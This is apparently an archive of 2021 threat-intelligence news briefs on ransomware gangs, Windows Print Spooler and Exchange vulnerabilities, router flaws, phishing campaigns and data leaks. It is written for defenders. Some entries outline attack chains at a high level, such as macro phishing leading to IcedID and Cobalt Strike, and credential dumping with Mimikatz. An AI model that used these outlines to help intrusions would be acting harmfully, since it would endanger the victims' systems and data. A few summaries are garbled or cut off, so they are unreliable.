    Cyjax analysts have detected a new Raccoon Stealer campaign that is leveraging live streaming platform, Twitch, and online community application, Discord. The Raccoon Stealer operators are pushing malicious links, shortened with Bitly, in the chat during live streams. If clicked, the user downloads a ZIP file called “Installer.zip” from the Discord content delivery network (CDN). Inside the ZIP file are over a dozen decoy rich text files (RTFs) and an executable called “Setup.exe”.

    FBI PIN: Indicators of Compromise Associated with OnePercent Group Ransomware

    The FBI has learned of a cyber-criminal group who self identifies as the “OnePercent Group” and who have used Cobalt Strike to perpetuate ransomware attacks against US companies since November 2020. OnePercent Group actors compromise victims through a phishing email in which an attachment is opened by the user. The attachment’s macros infect the system with the IcedID1 banking trojan. IcedID downloads additional software to include Cobalt Strike. Cobalt Strike moves laterally in the network, primarily with PowerShell remoting.

    FBI Flash Alert Warns on OnePercent Group Ransomware Attacks

    “The FBI has learned of a cyber-criminal group who self-identifies as the “OnePercent Group” and who have used Cobalt Strike to perpetuate ransomware attacks against US companies since November 2020. OnePercent Group actors compromise victims through a phishing email in which an attachment is opened by the user. The attachment’s macros infect the system with the IcedID1 banking trojan. IcedID downloads additional software to include Cobalt Strike. Cobalt Strike moves laterally in the network, primarily with PowerShell remoting. OnePercent Group actors encrypt the data and exfiltrate it from the victims’ systems. The actors contact the victims via telephone and email, threatening to release the stolen data through The Onion Router (TOR) network and clearnet, unless a ransom is paid in virtual currency. OnePercent Group actors’ extortion tactics always begin with a warning and progress from a partial leak of data to a full leak of all the victim’s exfiltrated data”

    637 Flaws in Industrial Control System (ICS) Products Were Published in H1 2021

    “Industrial cybersecurity firm Claroty published its third Biannual ICS Risk & Vulnerability Report that analyzes the vulnerability landscape relevant to leading automation products used across the ICS domain. The company reported that during the first half of 2021, 637 vulnerabilities affecting industrial control system (ICS) products were published, affecting products from 76 vendors,

    CISA Shares Guidance on How to Prevent Ransomware Data Breaches

    CISA's fact sheet includes best practices for preventing ransomware attacks and protecting sensitive information from exfiltration attempts. The federal agency issued these recommendations in response to most ransomware gangs using data stolen from their victims' networks as leverage in ransom negotiations under the threat of publishing the stolen info on dedicated leak sites.

    Razer Bug Lets You Become a Windows 10 Admin by Plugging in a Mouse

    A Razer Synapse zero-day vulnerability has been disclosed on Twitter, allowing you to gain Windows admin privileges simply by plugging in a Razer mouse or keyboard. Razer is a very popular computer peripherals manufacturer known for its gaming mouses and keyboards. When plugging in a Razer device into Windows 10 or Windows 11, the operating system will automatically download and begin installing the Razer Synapse software on the computer. Razer Synapse is software that allows users to configure their hardware devices, set up macros, or map buttons,

    Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities

    Malicious cyber actors are actively exploiting the following ProxyShell vulnerabilities: CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207. An attacker exploiting these vulnerabilities could execute arbitrary code on a vulnerable machine. CISA strongly urges organizations to identify vulnerable systems on their networks and immediately apply Microsoft's Security Update from May 2021—which remediates all three ProxyShell vulnerabilities—to protect against these attacks.

    Cisco Warns of Server Name Identification Data Exfiltration Flaw in Multiple Products

    Cisco is warning their customers of a vulnerability in Server Name Identification (SNI) request filtering for multiple products (Cisco Web Security Appliance (WSA), Cisco Firepower Threat Defense (FTD), and the Snort detection engine). Cisco is investigating the issue to determine affected products; Cisco stated that the following products are under active investigation to decide whether or not they are impacted:

    Rival Newcomer Hive's Ransomware-as-a-Service Operation Continues to Swarm Victims

    The operators behind LockBit have released a newer version of their crypto-locking malware that contains new capabilities, some of which they have borrowed from other cyber-criminal groups. The newly unsophisticated being referenced as "Hive" by security researchers has launched a data-leak (Titled: HiveLeaks) site where they have claimed to have successfully breached various organizations.

    Cars and Hospital Equipment Running Blackberry QNX May Be Affected by Badalloc Vulnerability

    "The FDA, in its warning that specific medical devices may be affected by BlackBerry QNX cybersecurity vulnerabilities, points to the CISA alert. CISA mentions CVE-2021-22156, which describes an integer overflow vulnerability in the calloc() function of the C runtime library of affected versions of BlackBerry® QNX Software Development Platform (SDP) version(s) 6.5.0SP1 and earlier, QNX OS for Medical 1.1 and earlier, and QNX OS for Safety 1.0.1 and earlier that could allow an attacker to potentially perform a denial of service or execute arbitrary code.

    Cisco Won't Fix Zero-Day RCE Vulnerability in End-Of-Life VPN Routers

    In a security advisory published on Wednesday, Cisco said that a critical vulnerability in Universal Plug-and-Play (UPnP) service of multiple small business VPN routers would not be patched because the devices have reached end-of-life. The zero-day bug (tracked as CVE-2021-34730 and rated with a 9.8/10 severity score) is caused by improper validation of incoming UPnP traffic and was reported by Quentin Kaiser of IoT Inspector Research Lab. Unauthenticated attackers can exploit it to restart vulnerable devices or execute arbitrary code remotely as the root user on the underlying operating system,

    The PrintNightmare Continues: Another Zero-Day in Print Spooler Awaits Patch

    The nightmare fiasco is still ongoing; some companies have realized that the safest solution at this point is to disable the printer service altogether and to also prevent users from installing drivers via Microsoft's native Point and Print function. "Since June, Microsoft has announced seven vulnerabilities in Print Spooler as researchers have continued to analyze the service and reverse engineer the patches, finding more flaws. To date, none of the solutions from Microsoft have fully addressed the issues in the Print Spooler service,

    Top 7 AWS Security Vulnerabilities Based on Real-World Tests

    Cloud security risks, in this case referencing AWS specifically, range from lack of security controls, vulnerabilities that could allow privilege escalation, and misconfigurations that could leave data accessible to prying eyes. These security implications are no different than ones for environments that are stored on-premises. Proprietary solutions like AWS require some fine tuning and due diligence just like operating systems, services, and software kept in IT closets on-site.

    Supply Chain Attacks Are Closing in on MSPs

    "Perhaps the most far-reaching supply chain attack conducted by a non-state actor in the history of the tactic took place this July. This time, Kaseya, one of the world's largest IT management platforms, was compromised by the Russia-based hacking group REvil. Unlike in the SolarWinds and Codecov, this attack included a ransomware stage meant to deliver financial rather than intelligence returns for the attackers." REvil targeted Kaseya's remote monitoring and management (RMM) solution, known as Kaseya VSA, which is used to manage client machines from afar. Again, targeting was indiscriminate, but unlike with espionage actors, the ransomware gang could focus on maximizing financial returns of the attack rather than trying to avoid detection.

    PrintNightmare Update

    Back in June, Microsoft patched a vulnerability affecting the Microsoft Windows Print Server that was tracked as CVE-2021-1675. Initially, it was described as an elevation of privilege vulnerability - EOP vulns could result in an attacker bypassing access restrictions on a machine/system. Access restrictions typically include ones that are enforced through domain-based group policies or local ones. The simplest subset of access restrictions applied on machines typically have preset groups;

    • Administrator
    • Power User
    • Standard

    These are predefined ACL's including Microsoft OS's ranging from XP to current OS versions. Of course, restrictions can be more granular/refined than what Microsoft provides us out of the box. What makes this vulnerability so dangerous is that any restrictions placed on a user's machine can be bypassed. An attacker could essentially do whatever they want to a targeted machine. They could install malware/ransomware or remote access tools to access devices without a user's knowledge.

    Case Files Affected in Dallas Police Department Data Loss

    An employee working for the department attempted to move data from one location to another. Reporting suggests the migration was to centralize data access on a single server. In a disclosure notice released last Wednesday, defense attorneys noticed that 22TB of data, approximately 22,528GB, had disappeared and possibly been deleted. After data recovery efforts, IT Teams restored approximately 14TB with around 8TB missing and unrecoverable.

    America's Secret Terrorist Watchlist Exposed on the Web Without a Password

    Comparitech, a company that we mentioned in previous report, has discovered another cloud misconfiguration resulting in data leakage. A list containing Terrorist Screening records was found on July 19th, when Censysand ZoomEye search engines indexed an exposed elastic search server. The list was left online without a password or any other authentication to secure it. It contained 1.9 million records, including full name, TSC watchlist ID, citizenship, gender, date of birth, passport number, and more,

    Blackberry QNX RTOS Vulnerabilities - BadAlloc

    CISA released an Alert today on devices incorporating older versions of multiple BlackBerry QNX products affected by a BadAlloc vulnerability. A malicious actor could exploit this vulnerability to take control of an affected system or cause a denial-of-service condition.

    SIM Swap Scammer Pleads Guilty to Instagram Account Hijacks, Crypto Theft

    The subject in question, a Massachusetts man, Declan Harrington charged with his alleged involvement in a series of SIM swapping attacks two years ago, has admitted to stealing cryptocurrency from multiple victims and hijacking the Instagram account of others, "Harrington was charged with Eric Meiggs in November 2019 for targeting the owners of high-value ('O.G.' or 'Original Gangster') Instagram and Tumblr accounts,

    Critical Remote Code Execution Vulnerability in Palo Alto Networks Cortex XSOAR

    Cortex XSOAR is a "detection and response platform used to unify case management, automation, real-time collaboration and threat intel management to serve security teams across incident lifecycles." Researchers discovered a vulnerability in the platform that could allow unauthenticated threat actors to execute arbitrary code over the Internet on fully integrated endpoints. The flaw exists due to insufficient validation of user input in .NET Core, which would allow remote threat actors to pass specially crafted entries into the vulnerable application(s).

    FINRA Alerts Firms to a Phishing Email Campaign Using Multiple Imposter FINRA Domain Names

    FINRA is a government-authorized not-for-profit organization that oversees U.S. broker-dealers. In ongoing phishing attacks, hackers are targeting U.S. Brokerage firms/brokers by impersonating FINRA officials threatening penalties against them. The company is primarily responsible for investigating potential securities violations and, when appropriate, bringing formal disciplinary actions against firms and their associated persons.

    CVE-2021-20090 Actively Exploited to Target Millions of IoT Devices Worldwide

    According to Tenable researchers, “Threat actors actively exploit a critical authentication bypass vulnerability, tracked as CVE-2021-20090, impacting home routers with Arcadyan firmware to deploy a Mirai bot. “A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication” (Security Affairs, 2021).

    Australian Govt Warns of Escalating LockBit Ransomware Attacks

    “The Australian Cyber Security Centre (ACSC) warns of an increase of LockBit 2.0 ransomware attacks against Australian organizations starting July 2021” (Bleeping Computer, 2021). The organization has seen a heavy increase in LockBit 2.0 activity in Australia. In their alert, they warn that victims of the ransomware have also seen their data stolen and leaked online, a double extortion technique seen by other ransomware operators. Attacks have really risen since July and continue to do so.

    Synology Warns of Malware Infecting NAS Devices with Ransomware

    Synology, a NAS storage device maker from Taiwan, warned this week that the StealthWorker botnet has been targeting their devices through ongoing brute force attacks that may lead to ransomware infection. The botnet uses already infected devices to try and guess common admin credentials on NAS devices. If the botnet guesses a password correctly it will attempt to download malware including ransomware. The devices may also be able to carry out additional attacks against other Linux based devices.

    Vishing Through Phishing Attacks

    As the title states, these phishing attacks are a little bit different. Phishing attacks that we've reported -- usually on a weekly basis contain malicious attachments in the form of Excel, PDF, or executables, to name a few. They typically contain malware or beacons so that threat attacks can remote into infected machines and control them. Depending on what type of access restrictions are applied on the targeted device during initial infection, it can either prevent an attacker from installing additional components or allow them to carry out further malicious activity/exfiltrate sensitive information. Even if a user account has access restrictions in place, an attacker could still leverage one of the several vulnerabilities disclosed right now to elevate privileges (if unpatched).

    Angry Conti Ransomware Affiliate Leaks Gang's Attack Playbook

    Ever hear the story of the disgruntled Network Administrator? One that leaves a company upset, who once (or still has) the keys to the kingdom - Domain Administrative Credentials, External I.P. Addresses to VPN appliances/Firewalls, and probably knows more about the network than anyone else within the organization? After leaving a company, it's likely at some point in time they've come back using the information acquired while employed or by installing backdoor software on servers or workstations before departure.

    Admin's Nightmare: Combining HiveNightmare/SeriousSAM and AD CS Attack Path's for Profit

    Black Hills produced a report outlining an attack scenario requiring user interaction for the attack to work (unsalted MD4 encryption), "an adversary would need to entice a remote user or system to authenticate back to the adversary-controlled host to relay the credential to the certificate server. If you recall, the Hive/SAM vulnerabilities could result in an attacker obtaining administrative rights on a machine by obtaining password hashes stored using a weak encryption algorithm. After obtaining the hashes from Windows Databases, using tools like MimiKatz and John the Ripper, an attack easily cracks the hash revealing passwords.

    New DNS Vulnerability Allows 'Nation-state Level Spying' on Companies

    Security researchers released details this week of a new type of DNS vulnerability which could allow attackers to target sensitive information on corporate networks. The vulnerabilities impact major DNS-as-a-Service (DNSaaS) providers who lease their services to organizations who do not want to manage and secure their DNS records on their own. “As revealed at the Black Hat security conference by cloud security firm Wiz researchers Shir Tamari and Ami Luttwak, these DNS flaws provide threat actors with nation-state intelligence harvesting capabilities with a simple domain registration”

    Google Chrome Stable Channel Update for Desktop to Patch Vulnerabilities Potentially Allowing System

    Google Chrome has had a tough year so far! Several vulnerabilities have been identified and disclosed, resulting in IT-Teams and staff updating their browsers quite frequently. In April, Google had to quickly patch multiple zero-days (or previously unknown flaws in Chrome's V8 JavaScript engine). The company openly admitted that the high severity bug was being exploited in the wild. In an advisory released by Google today, they’re urging everyone to update to version 92.0.4515.107 as soon as possible. Several High to Medium vulnerabilities were discovered, yet technical details have been withheld to prevent exploitation:

    7 Federal Agencies Still Lack Basic Cybersecurity

    In a 47 page report titled, “Federal CyberSecurity: America’s Data at Risk,” by the staff of the Senate Committee on Homeland Security and Governmental Affairs, which was released Tuesday (August, 3rd), states that the "Inspectors general identified many of the same issues that have plagued federal agencies for more than a decade, (BankInfoSecurity, 2021).” State, Housing and Urban Development, Agriculture, Health and Human Services and Education - and the Social Security Administration - are still failing to meet even basic cybersecurity standards,

    Multiple Vulnerabilities in Cisco Products

    Cisco has released multiple security updates to address several security vulnerabilities impacting Cisco Small Business products: CVE-2021-1574 and CVE-2021-1576 vulnerabilities affect the following Cisco Small Business Routers if they are running a firmware release earlier than Release 1.0.03.22: RV340 Dual WAN Gigabit VPN Router RV340W Dual WAN Gigabit Wireless-AC VPN Router RV345 Dual WAN Gigabit VPN Router RV345P Dual WAN Gigabit POE VPN Router CVE-2021-1602 vulnerability affects the following Cisco Small Business RV Series Routers if they are running firmware releases earlier than 1.0.01.04: RV160 VPN Routers RV160W Wireless-AC VPN Routers RV260 VPN Routers RV260P VPN Router with PoE RV260W Wireless-AC VPN Routers CVE-2021-1572 vulnerability affects the following Cisco products and releases: Cisco Network Services Orchestrator CLI Secure Shell Server ConfD CLI Secure Shell Server Releases 5.4 through 5.4.3.1 Releases 7.4 through 7.4.3 Releases 5.5 through 5.5.2.2 Releases 7.5 through 7.5.2

    COVID-19 Vaccine Portal for Italy's Lazio Region Hit With Cyber Attacks

    The attackers were able to access the organization's systems with administrator privileges where they then installed a "crypto-locker" malware that encrypted the data on the system. As a result of the attacks, systems were taken offline, preventing the organizations from accessing resources used in COVID-19 distribution in Lazio, Italy; "A "powerful" attack had hit the region's databases on Sunday and that all systems are disabled, including the Salute Lazio portal and the system that managed the COVID-19 vaccine bookings,

    RDP Brute Force Attacks Explained

    Remote Desktop Protocol continues to be leveraged in attacks. Honeypot activity observed by various companies and researchers shows that hackers are constantly attempting to brute-force their way into networks by trying to guess usernames and passwords combinations on RDP ports exposed to the Internet, "While you read these words, the chances are that somebody, somewhere, is trying to break in to your computer by guessing your password. If your computer is connected to the Internet, it can be found quickly, and if it can be found, somebody will try to break in,

    Experts Found Potential Remote Code Execution in PyPI

    Security researchers this week disclosed several flaws in PyPI. “Python Package Index (PyPI) is the official third-party software repository for Python. PyPI as an index allows users to search for packages by keywords or by filters against their metadata, such as free software licenses or compatibility with POSIX” (Security Affairs, 2021). The most severe flaw could potentially lead to the compromise of the entire PyPI infrastructure. The flaw affects the combine-prs.yml workflow in pypa/warehouse, which includes the current source code of PyPI.

    Microsoft Warns of Dangerous Phishing Email

    Microsoft warned this week of a phishing email using spoofed sender addresses. “Microsoft put out an alert after observing an active campaign targeting Office 365 organizations with convincing emails and several techniques to bypass phishing detection, including an Office 365 phishing page, Google cloud web app hosting, and a compromised SharePoint site that urges victims to type in their credentials. An active phishing campaign is using a crafty combination of legitimate-looking original sender email addresses, spoofed display sender addresses that contain the target usernames and domains, and display names that mimic legitimate services to try and slip through email filters," the Microsoft Security Intelligence team said in an update.”

    Remote Print Server Gives Anyone Windows Admin Privileges on a PC

    Using a remote print server, a researcher was able to gain complete control over a device by installing a print driver. “In June, a security researcher accidentally revealed a zero-day Windows print spooler vulnerability known as PrintNightmare (CVE-2021-34527) that allowed remote code execution and elevation of privileges. While Microsoft released a security update to fix the vulnerability, researchers quickly figured out ways to bypass the patch under certain conditions. Since then, researchers have continued to devise new ways to exploit the vulnerability, with one researcher creating an Internet-accessible print server allowing anyone to open a command prompt with administrative privileges”

    DarkSide Ransomware Gang Returns as New BlackMatter Operation

    According to reports this week, The DarkSide ransomware gang may have rebranded as a new ransomware operation called BlackMatter, and has been seen in ongoing attacks against corporate entities. Back in May of this year, DarkSide operators suddenly lost access to their servers and their cryptocurrency wallets were seized by an unknown third party. It was later revealed that the FBI had recovered 63.7 Bitcoins from the Colonial Pipeline attacks.

    BleepingComputer was made aware of multiple victims targeted by the BlackMatter ransomware group. So far ransom demands have ranged from $3-4 million dollars. “While researching the new ransomware group, BleepingComputer found a decryptor from a BlackMatter victim and shared it with Emisosft CTO and ransomware expert Fabian Wosar. After analyzing the decryptor, Wosar confirmed that the new BlackMatter group is using the same unique encryption methods that DarkSide had used in their attacks.”

    NSA Shares Guidance on How to Secure Your Wireless Devices/Guidance on MiTM Attack

    Staff is continuing to work from, and companies have realized that employees are just as efficient, if not more so, while traveling and working remotely from their home office or sofa. There are cybersecurity risks associated with teleworking, and we've explained and mentioned some of them quite frequently in our daily reporting and during our calls.

    Wireless security is often overlooked, and public networks should be considered 10/10 if they could be rated on the CVSS scale in terms of severity. As staff travel and continue to work remotely, it's apparent that they will need internet access to access corporate information and resources. The WFH transition has placed some of the cybersecurity burdens directly on employees as the confines of enterprise security products no longer secure them.

    McAfee: Babuk Ransomware Decryptor Causes Encryption 'Beyond Repair'

    Attackers are targeting Linux, ESXi (VMware), as well Unix variants. As outlined in a McAfee Advanced Threat Research report, the Babuk Ransomware gang is exploiting CVE-2021-27065 in Microsoft Exchange Servers. After initial access, the actors place a Cobalt Strike backdoor on the system, maintaining persistence, so they can come and go as they please. "Using a custom version of zer0dump, the attacker gained domain administrator credentials and used Mimikatz to get access to credentials. They are then using standard protocols like SSH/SCP to move files to and from systems (McAfee, 2021). "

    PunkSpider Tool at DEF CON Stirs Debate

    PunkSpider is a tool that pretty much anyone could use to identify weaknesses in websites. It can scan the internet, identifying ones that may have backend vulnerabilities. Depending on what type of vulnerabilities are discovered, an attacker could then exploit them. "The new and improved version is a "completely re-engineered" system that also expands the capabilities of the tool to find vulnerabilities,

    Ransomware Families: 2021 Data to Supplement the Unit 42 Ransomware Threat Report

    In a recent report from PaloAlto, researchers reiterate the importance of identifying/preventing phishing messages targeting companies and is the most effective way for criminals to deliver malware -- especially ransomware. Broken down by protocol, SMTP accounted for most attacks, with IMAP following close behind as the second delivery protocol. At an astounding 80.8%, PaloAlto notes that ransomware was delivered using the . P.E. (Portable Executable) extension/file type observed in attacks.

    Lockbit Ransomware Now Encrypts Windows Domains Using Group Policies4

    A new version of the LockBit 2.0 ransomware has been found that automates the encryption of a Windows domain using Active Directory group policies. The LockBit ransomware operation launched in September 2019 as a ransomware-as-a-service, where it can be purchased and used to attack companies. Affiliates earn 70-80% of a ransom payment, and the LockBit developers keep the rest.

    Is REvil Ransomware Operation Returning as 'BlackMatter'?

    REVil, the group responsible for the recent supply-chain attacks targeting MSPs and their customers, recently went offline. At this time, it is unknown whether Law-Enforcement/Government intervened in a coordinated effort taking them offline or they decided to close shop on their own free-will. Previously takedowns, raids, and seizures of 'underground' cybercriminal operations have been reported to be conducted and carried out by universal efforts from various agencies both government and private.

    Apple Patches Zero-Day Flaw That Hackers May Have Exploited

    The company released several updates for its various operating systems:

    • iPad (iOS)
    • Macintosh computers (MacOSX)
    • Mobile (iOS)
    The list of impacted devices includes Macs, iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini four and later, and iPod touch (7th generation). The vulnerability impacting the operating systems is tracked as CVE-2021-30807 and described as a memory corruption issue in the IOMobileFramebuffer kernel extension, which an anonymous researcher reported.

    Microsoft Releases Guidance for Mitigating PetitPotam NTLM Relay Attacks

    "Windows Challenge/Response (NTLM) is the authentication protocol used on networks that include systems running the Windows operating system and on stand-alone systems. (Microsoft, 2018)." "NTLM credentials are based on data obtained during the interactive logon process and consist of a domain name, a user name, and a one-way hash of the user's password. NTLM uses an encrypted challenge/response protocol to authenticate a user without sending the user's password over the wire. Instead, the system requesting authentication must perform a calculation that proves it has access to the secured NTLM credentials. (Microsoft, 2018).

    Popular Wi‑fi Routers Still Using Default Passwords Making Them Susceptible to Attacks

    A recent study is suggesting that 1 in 16 home routers are configured with a default admin username/password combination, typically admin/admin or admin/password, which are easily guessable. By scanning the internet researchers uncovered that, "out of the total of 9,927 routers that they tested, they found that 635 were susceptible to default password attacks, (Comparitech, 2021)."

    Microsoft Warns Over This Unusual Malware That Targets Windows and Linux

    The operating systems are being infected with the LemonDuck crypto-mining malware, which is being distributed via traditional phishing tactics, removable media (flash drives), brute force attacks and internet-facing vulnerabilities (Exchange Server), "[LemonDuck] continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise, (Microsoft, 2021)."

    Researchers Find New Attack Vector Against Kubernetes Clusters via Misconfigured Argo Workflows Inst

    Researchers at Intezer have detected a new attack vector against Kubernetes (K8s) clusters via misconfigured Argo Workflows instances. The company reported that they've observed attackers dropping cryptominers using this method in the wild. They've detected hundreds of misconfigured environments that belong to companies from various sectors, including technology, finance, and logistics.

    Cybercriminals Rewrite Malware to Target MacOS

    Cybercriminals have repurposed a piece of Windows malware to target macOS devices. The malware called XLoader is based off FormBook, a common malware strain over the past five years. This new variant is widespread and inexpensive. FormBook was so common research shows it has impacted 4% of organizations worldwide. The original FormBook was offered for just $29 per week and was designed “as an information stealer to steal credentials from different Web browsers, collect screenshots, monitor and log keystrokes, and download and execute files according to instructions from an attacker's command-and-control server” (Dark Reading, 2021).

    Exploitation of Pulse Connect Secure Vulnerabilities

    Since March 31, 2021, CISA and Ivanti have assisted multiple entities whose vulnerable Pulse Connect Secure products have been exploited by a cyber threat actor. To gain initial access, the threat actor is leveraging multiple vulnerabilities, including CVE-2019-11510, CVE-2020-8260, CVE-2020-8243, and the newly disclosed CVE-2021-22893 The threat actor is using this access to place webshells on the Pulse Connect Secure appliance for further access and persistence. The known webshells allow for a variety of functions, including authentication bypass, multi-factor authentication bypass, password logging, and persistence through patching.

    New Linux Kernel Bug Lets You Get Root on Most Modern Distros

    Researchers at Qualys discovered another vulnerability that could allow an unprivileged attacker to gain privileges by exploiting a local privilege escalation vulnerability in default configurations of the Linux Kernel's filesystem layer on vulnerable devices. Qualys researchers have give the flaw the name of Sequoia which impacts all Linux kernel versions released since approximately 2014.

    A Bug in Fortinet Fortimanager and Fortianalyzer Allows Unauthenticated Hackers to Run Code as Root

    The company has released patches for its FortiManager and FortiAnalyzer network management solutions. The vulnerabilities could’ve allowed an attacker to execute code against targeted devices with root privileges. The bug was disclosed by Cyrille Chatras of the Orange Group. The company has since released a workaround and patches to correct the software deficiencies.

    China Says Microsoft Hacking Accusations Fabricated by US and Allies

    There were several publications that were shared and released yesterday regarding malicious activity determined to be originating from China in Nation-State attacks against the United States. APT40, also known as Bronze Mohawk, FeverDream, G0065, Gadolinium, GreenCrash, Hellsing, Kryptonite Panda, Leviathan, MudCarp, Periscope, Temp.Periscope, and Temp.Jumper have determined to be located in Haikou, Hainan Province (People’s republic of China PRC) and have been active since approximately 2019.

    HP Patches Vulnerable Driver Lurking in Printers for 16 Years

    HP this week patched a severe vulnerability tracked as CVE-2021-3438. The vulnerability received a CVSS score of 8.8 and has resided in a printer driver for the past 16 years. “The security issue is described as a "potential buffer overflow in the software drivers for certain HP LaserJet products and Samsung product printers could lead to an escalation of privilege" (ZDNet, 2021). HP, Xerox, and Samsung printer models likely contained the vulnerable driver software since 2005.

    Ransomware Hits Law Firm Counseling Fortune 500, Global 500 Companies

    On February 27th, 2021 the company became aware of a breach impacting their systems. The attackers were able to access, "certain individuals' names, dates of birth, driver's license numbers / state identification numbers, financial account information, Social Security numbers, passport numbers, payment card information, medical information, health insurance information, biometric data, and/or online account credentials (i.e. usernames and passwords),

    New Windows Print Spooler Zero Day Exploitable via Remote Print Servers Summary: Microsoft released

    Microsoft released a security update to fix the vulnerability but researchers determined that the patch could be bypassed under certain conditions. Since the incomplete fix, security researchers have been heavily scrutinizing the Windows printing APIs and have found further vulnerabilities affecting the Windows print spooler. Researchers discovered that by executing a malicious dynamic link library via 'Queue-Specific Files' feature of Windows Point and Print Capability could enable an attacker to move laterally through a network. When the DLL is executing on a target machine, it will run with SYSTEM privileges and could be used to run any command on the target computer.

    D-Link Issues Hotfix for Hard-Coded Password Router Vulnerabilities

    D-Link manufactures networking equipment that can be utilized in home or enterprise environments. Equipment can be purchased in stores as well and online and are typically cost effective solutions for consumers. Cisco security teams discovered a vulnerability in the DIR-3040 model firmware, which contains hardcoded passwords, command injection vulnerabilities and information disclosure bugs.

    CISA Releases Mitigation and Hardening Guidance for MSPs and Small to Medium Size Businesses After K

    On Friday, July 2, we reported that attackers were actively exploiting a Zero-Day vulnerability in Kaseya VSA Software via a supply-chain attack -- as the attacks were ongoing. Primary targets were Managed Service Providers and Managed Security Service Providers; during the attack, little details were known, like the initial attack vector (entry point) and how the attackers were accessing internal networks and ultimately encrypting systems.

    Trickbot Improves its VNC Module in Recent Attacks

    Earlier this year the TrickBot botnet was dismantled by global law enforcement, after a brief hiatus, the botnet has reemerged in recent attacks. “The authors recently implemented an update for the VNC module used for remote control over infected systems” (Security Affairs, 2021). Despite actions from law enforcement, the botnet continues to see revisions.

    Emergency Directive 21-04: Mitigate Windows Print Spooler Service Vulnerability

    In the directive, CISA states that they have "Become aware of active exploitation, by multiple threat actors, of a vulnerability (CVE-2021-34527) in the Microsoft Windows Print Spooler service. The exploitation of the vulnerability allows an attacker to remotely execute code with system-level privileges enabling a threat actor to quickly compromise the entire identity infrastructure of a targeted organization, (CISA, 2021)."

    Threat Actors Scrape 600 Million LinkedIn Profiles and are Selling the Data Online – Again

    For the third time this year, threat actors have scraped data from LinkedIn. The archive contains data from hundreds of millions of LinkedIn profiles. It is currently being sold on a dark web forum. The actor involved in the attack “claims that the data is new and “better” than that collected during the previous scrapes. Samples from the archive shared by the author include full names, email addresses, links to the users’ social media accounts, and other data points that users had publicly listed on their LinkedIn profiles.”

    Operation SpoofedScholars: A Conversation with TA453

    A recent report from Proofpoint researchers suggests that TA453 is a state-sponsored actor-operator acting on behalf of Iran, supporting the Revolutionary Guard Corps (IRGC) in their collection of information. The actors illegally obtained access to a website belonging to a world-class academic institution to leverage the compromised infrastructure to harvest the credentials of their intended targets. Initial communications were established through an email message appearing to be from a “Dr.Hanns Bjoern Kendel, Senior Teaching and Research Fellow at SOAS University in London (ProofPoint, 2021).” The email address was registered on Gmail as hannse.kendel4@gmail[.]com, which was used to engage in conversation with intended targets.

    SolarWinds Issues Hotfix for Zero-Day Flaw Under Active Attack

    Yesterday, we reported that Microsoft had discovered vulnerabilities in SolarWinds Serv-U software. To recap, the vulnerabilities exist in the Serv-U Managed File Transfer and Serv-U Secured FTP platforms. Impacted versions included the latest release on May 5, version 15.2.3 HF1, and all previous versions of the software. A proof of concept exploit provided by Microsoft to the company directory displayed how an attacker could “install programs; view, change or delete data; or run programs on the affected systems (Microsoft, 2021)” via remote code execution where SSH is enabled on Serv-U products.

    Hackers accessed Mint Mobile subscribers' data and ported some numbers

    MVNO stands for Mobile Virtual Network Operator. MVNOs do not own the infrastructure to facilitate communications, instead they have contracts with larger carriers who grant smaller companies access to resources for resale. Mint mobile, is an upcoming MVNo operating off of T-Mobile networks based in the United States. Because of their low priced cellular plans the company has been growing pretty steadily in terms of subscribers

    Kaseya Rolled out a Patch for VSA Supply-Chain Attack

    The Kaseya attacks against numerous Managed Service Providers (MSP) and Managed Security Service Providers (MSSP's) resulting in REvil ransomware affiliates encrypting company systems has released patches to address a series of vulnerabilities. Critical vulnerabilities included credential leaks and cross-site scripting vulnerabilities in the company's VSA software. At this time, it is unclear which vulnerabilities the attackers leveraged explicitly, but it is suspected that they were chained together, bypassing the software authentication mechanisms.

    Flashpoint - Russian Attacks on Critical Infrastructure

    Attacks similar to those perpetrated in Ukraine have later been observed in other countries, notably Germany—suggesting that Russia learns from the attacks it conducts in Ukraine and conducts further attacks in more strategic countries. Examining Russian attacks in Ukraine can thus potentially provide hints to Russia’s thinking about future attack plans.

    Flashpoint: IceDID Attacks and Evolving Ransomware Trends

    Over the last several months Flashpoint analysts have observed an increase in activity by the “IcedID” trojan. The activity includes multiple campaigns that have been publicly observed, indicating an increase in proliferation of IcedID. The initial infection vector is commonly spear-phishing or malicious document macros. Once installed, the trojan drops other malware, leading to further access after the initial infection.

    Flashpoint - REvil Ransomware and Threat Actor Group

    REvil attempts to encrypt data and delete shadow copy backups to make data recovery more difficult. It then demands a ransom from victims to recover the data. REvil ransomware is usually installed directly by a threat actor who has either accessed an unprotected RDP port or exploited common vulnerabilities such as CVE-2019-2725 and CVE-2018-8453 to gain access to a network and escalate privileges.

    Flashpoint - REvil Attack on Kaseya VSA Tool

    The Russian ransomware extortionist threat group "REvil" conducted a supply-chain ransomware attack on July 2, 2021, that has affected “fewer than 60” managed service providers (MSPs) and “fewer than 1,500” downstream businesses in at least seventeen countries.

    Lazarus Gang Targets Engineers with Job Offers Using Poisoned Emails

    Security researchers from AT&T Alien Labs shared new intelligence surrounding Lazarus Group and their continued targeting of security experts. In their newest campaign the group is targeting engineers working in the defence industry. Using emails and social media platforms the group has created fake job offers to target defence contractors in the United States and Europe. “Attached to the emails are Word documents containing macros that plant malicious code onto a victim’s computer, and make changes to the targeted computer’s settings in an attempt to avoid detection”

    Hackers Use a New Technique in Malspam Attacks to Disable Macro Security Warnings in Weaponized Docs

    A popular form of phishing involved the use of Microsoft Office documents loaded with malicious macros. Using social engineering tricks and business email compromise, cybercriminals would convince users to download a malicious file which requires macros to view, upon enabling the macros, the documents communicate with the attacker’s server to download malware onto the machine.

    Experts Bypassed Microsoft’s Emergency Patch for the PrintNightmare - Microsoft PrintNightmare Security Updates Work

